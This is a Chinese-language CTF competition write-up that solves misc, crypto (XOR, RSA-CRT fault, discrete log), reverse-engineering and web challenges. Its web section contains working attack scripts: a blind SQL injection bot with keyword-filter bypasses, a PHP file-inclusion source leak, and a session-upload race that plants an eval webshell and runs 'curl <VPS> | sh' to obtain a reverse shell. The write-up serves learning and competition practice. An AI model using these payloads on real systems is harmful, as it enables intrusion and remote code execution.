MISC
複合
嘗試匯出http資料
發現檔案型別和檔名都被改過
把pass.md改為pass.zip,發現打不開
新增檔案頭
解壓得到
Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=
moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=
=E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=
h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80=
=82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2=80=
=82ox=E2=80=82hsjr:=E2=80=82mom=E2=80=82luyik,=E2=80=82kfx=E2=80=82dwhrh-wi=
=E2=80=82iympwagp,=E2=80=82vru=E2=80=82ral=E2=80=82qzveomvlm.=E2=80=82Aw=E2=
=80=82fgc=E2=80=82olrr=E2=80=82fhvl=E2=80=82nivpkf=E2=80=82vhzr=E2=80=82vvj=
jvqlpwagpn=E2=80=82jrje=E2=80=82pvgu=E2=80=82xcijc=E2=80=82vhbrmsmmvq=E2=80=
=82bz=E2=80=82vbz=E2=80=82xj=E2=80=82jrsea=E2=80=82bukq=E2=80=82wyk=E2=80=
=82kxymye=E2=80=82xj=E2=80=82hvqvyqok=E2=80=82xcid.=E2=80=82Uav=E2=80=82jro=
rb=E2=80=82cfsgn=E2=80=82knt=E2=80=82oisn=E2=80=82uahb=E2=80=82vz=E2=80=82m=
n=E2=80=82pzix=E2=80=82aw=E2=80=82ok=E2=80=82sgh?=E2=80=82Nfh=E2=80=82aznor=
zh=E2=80=82zl=E2=80=82plagkvi=E2=80=82wtgxubvlmx=E2=80=82qvbbjqak=E2=80=82h=
vvvq=E2=80=82gvb=E2=80=82gxc=E2=80=82os=E2=80=82sc=E2=80=82khbvurvp?=E2=80=
=82Wjtn=E2=80=82qf=E2=80=82rmai=E2=80=82zq=E2=80=82yhvggwomt.Ygk=E2=80=82eu=
u=E2=80=82gvyxfm=E2=80=82bx=E2=80=82vt=E2=80=82xci=E2=80=82kylr-weoiixvb=E2=
=80=82btxrxeommc=E2=80=82hm=E2=80=82kbtxzqgmkhzl=E2=80=82siymtggl=E2=80=82k=
nt=E2=80=82xmycw=E2=80=82vsivs=E2=80=82xci=E2=80=82mgkacr=E2=80=82uj=E2=80=
=82kekgxukr?=E2=80=82Kzzr=E2=80=82scyvzr=E2=80=82seiexcw-jiek=E2=80=82mimkg=
taqikw=E2=80=82ns=E2=80=82xpxhbye=E2=80=82migictzmq=E2=80=82zlz=E2=80=82tic=
lzcek,=E2=80=82tccjgvpiay=E2=80=82azvv=E2=80=82dttwhypt=E2=80=82xzkx-kzvbii=
,=E2=80=82xiybumq=E2=80=82zs=E2=80=82nivi=E2=80=82xmnvimzrtw=E2=80=82bu=E2=
=80=82iyr=E2=80=82xcmeel,=E2=80=82jiek=E2=80=82sa=E2=80=82trrblvgy=E2=80=82=
tmsdgglvgrc=E2=80=82vqflz=E2=80=82aprs.=E2=80=82Xj=E2=80=82wlaa=E2=80=82wme=
ysiw,=E2=80=82kfx=E2=80=82apbakcx=E2=80=82fd=E2=80=82kliqorb=E2=80=82e=E2=
=80=82emolt=E2=80=82zgc=E2=80=82nivk=E2=80=82t=E2=80=82wzblpdkrrx=E2=80=82d=
ifzi=E2=80=82jj=E2=80=82kgfl.=E2=80=82Eue=E2=80=82wkieb=E2=80=82avcey=E2=80=
=82vzeuggn=E2=80=82iouyo=E2=80=82ayym=E2=80=82umikv=E2=80=82cegnxumq?=E2=80=
=82Zldw=E2=80=82hsxzbvur=E2=80=82cej=E2=80=82zxlv=E2=80=82rrslyvlmsg=E2=80=
=82ntwriicw=E2=80=82vdrx=E2=80=82xci=E2=80=82pctya=E2=80=82oe=E2=80=82xcsjc=
=E2=80=82pow=E2=80=82hyi=E2=80=82gmkckhbhxi=E2=80=82dr=E2=80=82dcwpknr=E2=
=80=82iyytympwa.=E2=80=82
根據特徵發現是quoted-printable編碼
Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa.
把flagggggg.exe改為.doc
FLAG.png則是everything 的安裝包
獲得一個key:everything
維吉尼亞解密
Arguably the greatest novel ever written about aging, Gabriel Garcia-Marquez Love in the Time of Cholera may be a challenging text for those who need to read it most: the young, the would-be rational, and the impatient. To say that many health care professionals fall into these categories is not to fault them but merely to describe them. Who being young can know what it is like to be old? Who trained in western scientific medicine dares not try to be rational? Flag is life is fantastic.And who caught up in the task-oriented imperative of contemporary medicine can truly claim the virtue of patience? Even before managed-care initiatives so greatly increased the pressure, physicians were famously time-driven, trained to seek efficiency in all things, care of patients prominently among them. To such persons, the thought of reading a novel may seem a profligate waste of time. Why spend hours reading about what never happened? This question has been eloquently answered over the years by those who use literature in medical education.
Flag is life is fantastic
flag{life_is_fantastic}
EasySteg
reverse一下
然後不知道怎麼寫了,有沒有大神
CRYPTO
crypto-xor2
”輪環異或加密,你能解開麼?格式:flag{}“
檔案下載有一個py檔案和一個文字檔案
從描述可得知就是一個異或加密
from secret import flag
key = "xxxx" # not real key
cipher = ""
for i, c in enumerate(flag):
cipher += chr(ord(c) ^ ord(key[i%4]))
with open("cipher", "w") as f:
f.write(cipher)
先把cipher亂碼列印出來,再比葫蘆畫瓢異或就行
key = "xxxx"
f = open("cipher", "rb")
for i in f:
print(i)
#b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'
flag = b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'
cipher = ""
for i, c in enumerate(flag):
cipher += chr(c ^ ord(key[i % 4]))
print(cipher)
#flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}
RSA Fault
題目基於RSA的CRT解密故障,正常流程下,RSA的CRT解密流程是:
- 計算mp = c^dp % p
- 計算mq = c^dq % q
- CRT組合得到模n下的明文m
而在這一題目中也是按照這個流程進行解密的,只是解密時出現了一點故障,如下:
def fault_signature(m,dp,p):
bits = list(range(dp.bit_length()))
# Random Errors
for i in range(2):
dp ^= 1 << bits.pop(randbelow(len(bits)))
return pow(m,dp,p)
也就是說,在計算mp、mq時,dp、dq都發生了兩位元的隨機翻轉,這會導致什麼後果呢?我們以dp做例子看一看錯誤結果與正確結果的關係是什麼,假設發生故障後,dp的第i位元位由1變成0,第j位元位由0變成1,則有:
那麼計算明文時,原本正確的mp應該是:
𝑚𝑝=𝑐𝑑𝑝(𝑚𝑜𝑑 𝑝)m**p=cdp(mod**p)
而發生了故障後變為:
𝑚𝑝′=𝑐𝑑𝑝′=𝑐𝑑𝑝−2𝑖+2𝑗(𝑚𝑜𝑑 𝑝)m**p′=cdp′=cdp−2i+2j(mod**p)
也就是:
𝑚𝑝′=𝑚𝑝𝑐−2𝑖+2𝑗(𝑚𝑜𝑑 𝑝)m**p′=mpc−2i+2j(mod**p)
這就是正確值和錯誤值的關係所在,那麼怎麼利用呢?我們觀察他的CRT組合過程:
def fast_sign(p,q,m,d):
Sp=fault_signature(m,d%(p-1),p)
Sq=fault_signature(m,d%(q-1),q)
q_inv_p=inverse(q,p)
return Sq+((Sp-Sq)*q_inv_p%p)*q
exp:
from Crypto.Util.number import *
from tqdm import *
from gmpy2 import powmod
n=574370586922196377355321224190746373039960224108385243176501127428241048239267855106791452531127716395867009150959315133488286007016233693579335880694651355103104937242790643593308890788070770218317565926178413379641001140239463599845984585594216005669250735996427555432706918692021991171275999765908594644925310142503285857206438695393554469523893825536665449736024054747514990216868678037268511584416901858031484008394871632441625217801474466940448366132590034239161293582715621533020233700914500451000518789317508997706548731775994224900635411275356861073588492237057246039324320408280417962081059669609944892848853780428862986621290797973749713412083663630592820568996851852624888672199864050563167321198235872086549523724070759241183192416218511190119068501395848056263721692763920519420483450363920749842894919641617223824549955451175853298676915196907992214900910995739550922989640910170960485331090144764984190331659966983894284549074935918333832010695306946738396909292095557434605170122130253447970074530010535669698871315126545879037607033278200101983233974781109773521793185318497615158089955239305362817170200396186939592803861438759399366317967907276433739944705398688186125687434884160720331949648831768235019520753051
c=362746477666691362768020792694001662947338474716913368693174463002520197020564066827257658031973928782798475691408938544507860754837561076547768524746177804704585961840013195670850383664598530250844247051357401431355747035161872296498272254812117528152035029837329888665483050219346048506686826529658339084796751613191344103470399897412327265769031997892130002446603232458409236206943209821169103651387451247194645094911282908657256087747570185214886614187576679719039472798093505360214315789098466937327166004179112376884521755838649234980317596136131856395020357496102439866802500120832803908679095031213229175799928906606183829594039803465175754892790016569054202014492252632598390521485126555541028488750683218149923230255353856768460065582373942152212466578732981079533510158716511814895961705462125751613632997737277288382147402327477915047046907933387151859100428914053565582939275934201969543786806286829008145312080251388532179582069076383305307261868697565579486745927759554919760999971562169014832448067746716988944857402974596263631030324458073601261131647030891982010744785938573077302132228457909917393551651580730603193283673617373961392738841147569262489888662190518624689563339261875140574320207133638608459439737908
e=65537
m_=181132170825291068274428850998643597061484670852441092778734815200952945165798640567559048182854905384108012241001865806757291292964878403693878633267090257939702439086938795033128278779133834594418004509584542651057754389391530368493133213945631248904554493258521520798694334742694993906802448945319763766711250429667767598356479263059390167552213786607866923685142648716071350485727194734337940552363833868066952302121733855882534848604214379852034329599650298994536987432597047148545264456233041626319601655687038246563924371156826280023920057214856878486989521822479101902273314188727929753114744387793613654594486456078456745565816416446216301510436912147365878585967444947975888852483708054850555285865986707367641310078228756765470506112047816213856326341605584860221570211438661212837691148838965467195299751453604986777239749470579607668379117939736929002608940866262332919423512927188694030664492052057406513313547841154542784730283602499247284074861014689921502985853652524070575242018309321538365113665998744193304726118797289396908257027371761721071940141406755037691084908985405935268861122559095563199460082893754126987724947094729974089127671509635467188911500940561377499209529543406027692937688249517323189766222196
if(0):
temp = pow(m_,e,n)*inverse(c,n) % n
is_positive = [(1,1),(1,-1),(-1,1),(-1,-1)]
for i in trange(1,2**9):
for j in range(1,2**9):
for k in is_positive:
pow1 = k[0] * (1 << i)
pow2 = k[1] * (1 << j)
powpow = e*(pow1+pow2)
temp1 = powmod(c,powpow,n)
if(GCD(temp-temp1,n) != 1):
print(GCD(temp-temp1,n))
exit()
p = 22729650064982784569842293886112765216527000770423090114368848726216608009470242046289112001066994207864986803275467348289746127450153723652496430471357120041795298501429299577023455880461653074271752126909063527106805373676824002441432786073264913608717964699805549233067291369590239167126966358735428766668880762276154481715084785307608648063807156963867353713246912838175911702373808989338864178007028831198106910117378309595596445705841624769259901086135441435201197082487810720560245568126972348046187117147996691190165006379956721543713979012391623875001928207563847027939516349080119621035628223197354404395029
q = n // p
phi = (p-1)*(q-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))
flag{r$a_fault_w1th_C5T_m3thod_01a7da73}
EzLog
from Crypto.Util.number import *
p = 100380180012669637378744942171261398091918624065560475592116442008723831000724625143134783707140522784290998397673597179788440926203643287774297527809892664834392514365222771089497090006645985087685142898313371176199974996077656302299931624478967894041880873282005346940525877863969908284953093553124147377177
g = 5
y = 96684738736980459903034929785324785968796025930893469779531286222406396988966715592949333235326832011076688325476630562163362584667393368651336925308324274452289994386658111183814813840211779123227496106401048680166365937882835154692663834966767665274167877263256747696012785293060701554746392300871850636481
factors = [3^2,56989,60217,538687139,560945999,571334087,610502371,631183649,632950873,635821279,650856469,655219333,656624429,681519161,718737731,731233123,733484177,763003931,789196883,819494821,819518603,844402217,857626969,895870279,907446997,908829937,950563309,972564941,1030070381,1048221233,1063554559]
phi = prod(factors)
h = (p-1) // phi
#part1 use Pohlig-hellman to get first-step m0(use sage)
m0 = discrete_log(Mod(pow(y,h,p),p),Mod(pow(g,h,p),p),ord = phi)
#part2 guess the suffix is "}."" and padlen is 13
padlen = 13
suffix = bytes_to_long(b"}." + long_to_bytes(padlen)*padlen)
length = padlen + 2
m1 = (m0-suffix)*inverse(256^length,phi) % phi
#part3 bsgs(use sage)
y1 = y * pow(g,-(256^length*m1+suffix),p) % p
g1 = pow(g,256^length*phi,p)
k = discrete_log(Mod(y1,p),Mod(g1,p),ord = p-1,bounds = (0,2^(1024-860-length*8)))
#part4 get flag
flag = 256^length*(k*phi+m1)+suffix
print(long_to_bytes(flag))
#b'You are a master of the dlp algos! Here is your flag: flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}.\r\r\r\r\r\r\r\r\r\r\r\r\r'
flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}
REVERSE
pyre
這種exe檔案怎麼呼叫py的庫?要怎麼逆呢,小茗同學,你來試試吧?
安裝uncompyle6
pip install uncompyle6
uncompyle6 Origin.pyc
得到原始碼
def check():
a = input("plz input your flag:")
c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
if len(a) != 42:
print("wrong length")
return 0
b = 179
for i in range(len(a)):
if ord(a[i]) * 33 % b != c[i]:
print("wrong")
return
print("win")
check()
編寫爆破函式
def crack():
c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
b = 179
for enc in c:
for i in range(32,127):
if 33 * i % b == enc:
print(chr(i),end='')
break
crack()
flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
WEB
一下是貼別人WP
Web | easy_ctf (141pt)
把內容拿出來,然後統計一下,再排個序,最後提交一下就行了。
import requests
import re
RE = re.compile(r'^([a-zA-Z0-9]*)<td>', re.MULTILINE)
def f(r):
p = {}
for c in r:
if c in p:
p[c] += 1
else:
p[c] = 1
a = [ (v, k) for (k, v) in p.items() ]
a = sorted(a)
return ''.join([ c[1] for c in a ])
s = requests.Session()
r = s.get('http://120.79.191.238:42399')
while True:
print(r.text)
m = re.search(RE, r.text)
a = m.group(1)
a = f(a)
r = s.post('http://120.79.191.238:42399', data={'ans': a})
Web | easysql (833pt)
經測試和觀察,不難發現廣告名是是有注入點的,可以用 '||{sql}||' 的方式注入。然後廣告提交之後,可以檢視詳情,透過觀察這條廣告是否正常顯示,就可以知道 {sql} 的條件是否為真。所以可以用盲注。
並且可以發現,廣告名是有關鍵詞過濾的,包括 in, or, and, union, password 等,其中 and 和 or 可以用 && 和 || 繞過。
然後由於遮蔽了 in 和 or 導致沒有辦法透過 information_schema 或 mysql.innodb_table_stats 查詢表名和列名,且 MariaDB 沒有 sys 庫。
故使用偉大的盲猜方法(指猜了好幾個小時),猜出裡面有一個 ads 表,裡面有 22 列;一個 users 表,有 id, name 和感覺有的 password 三列(但是並沒有什麼卵用,因為 admin 帳號啥都沒有)。
然後又使用盲猜大法(admin的md5搜到了極其相似的題目,考慮可能有flag欄位/表/庫),找到了一個 flag 表,然後在未知列名的情況下,用 SELECT (SELECT * FROM flag) >= (SELECT 1, {string}) 來盲注,就可以拿到一個沒有區分大小寫的 flag。
小小爆破了一下flag,因為太菜了沒不到大小寫敏感的注入查詢方法(過濾了bINary,MariaDB還沒有json)
然後又 xjb 列舉,發現 flag 只有 sql 的首位大寫,即 flag{Sql_1nj3cti0n_1s_s0_easy},提交可過。
import requests
import re
cookies = {'PHPSESSID': '_______________'}
RE = re.compile(r'detail\.php\?id=(\d+)')
def clear_list():
requests.get('http://120.79.141.85:47930/empty.php', cookies=cookies)
def add_ads(title):
global aid
payload = {'title': title, 'content': 'Elaina is best', 'ac': 'add'}
r = requests.post('http://120.79.141.85:47930/addads.php', cookies=cookies, data=payload)
aid += 1
assert '已傳送申請' in r.text, title
def check_sql(sql):
global aid
if aid % 10 == 0:
clear_list()
add_ads('1')
sql = sql.replace(' ', '/**/')
add_ads(f"'||{sql}||'")
requests.get(f'http://120.79.141.85:47930/index.php', cookies=cookies)
r = requests.get(f'http://120.79.141.85:47930/detail.php', params={'id': str(aid)}, cookies=cookies)
return '待管理確認' in r.text
class CharBinarySearch:
def __init__(self):
self.l = 0
self.r = 128
def is_done(self):
return self.l + 1 >= self.r
def middle(self):
return (self.l + self.r) // 2
def update(self, r):
if r:
self.l = self.middle()
else:
self.r = self.middle()
def main():
global aid
aid = 0
clear_list()
add_ads('1')
r = requests.post('http://120.79.141.85:47930/index.php', cookies=cookies)
aid = int(re.search(RE, r.text).group(1))
print(f'Initial ID: {aid}')
# # 可爆破出列數
# for i in range(1, 64):
# s = ','.join(["''"] * i)
# r = check_sql(f"(SELECT (SELECT {s})<(SELECT * FROM flag LIMIT 1))=true")
# print(i, r)
content = ''
for i in range(len(content) + 1, 128):
s = CharBinarySearch()
while not s.is_done():
# r = check_sql(f"(SELECT HEX(SUBSTR(database(),{i},1))>=HEX({s.middle()}))")
p = content + chr(s.middle())
p = hex(int.from_bytes(p.encode(), 'big'))
r = check_sql(f"(SELECT (SELECT * FROM flag) >= (SELECT 1, {p})) = 1")
# r = check_sql(f"((SELECT HEX(SUBSTR(name,{i},1)) FROM users LIMIT 1 OFFSET 0)>=HEX({s.middle()}))")
print(f'{i} {s.middle()} => {r}')
s.update(r)
content += chr(s.l)
print(content)
if __name__ == '__main__':
main()
Web | in (138pt)
隨便點點,發現http://119.23.247.96:45837/action.php?file=2.txt 可以讀檔案,嘗試包含action.php自身,發現卡頓且無返回,說明包含方式很可能是include
先看一眼伺服器是apache,不能包含日誌拿shell,於是考慮看看PHP的原始碼
偽協議讀到原始碼http://119.23.247.96:45837/action.php?file=php://filter/convert.base64-encode/resource=action.php
開頭看到session_start()大機率是session包含,偷懶直接用session競爭的板子拿shell
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd": "system('curl 106.52.237.196 | sh');"}
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post('http://119.23.247.96:45837/action.php',
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})
def read(session):
while True:
resp = session.post('http://119.23.247.96:45837/action.php?file=/tmp/sess_' + sessid, data=data)
if 'tgao.txt' in resp.text:
print(resp.text)
event.clear()
if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()
執行後立刻在vps上成功收到了反彈的shell(應該不用這麼暴力也能解)
法二:
讀取action.php的原始碼http://119.23.247.96:47473/action.php?file=php://filter/convert.base64-encode/resource=action.php
<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
$_SESSION["username"] = $name;
}
include($_GET['file']);
?>
可以看到是session檔案包含,目錄為/tmp/sess_PHPSESSID,寫入webshell即可,先ls /獲取到flag檔名在讀取
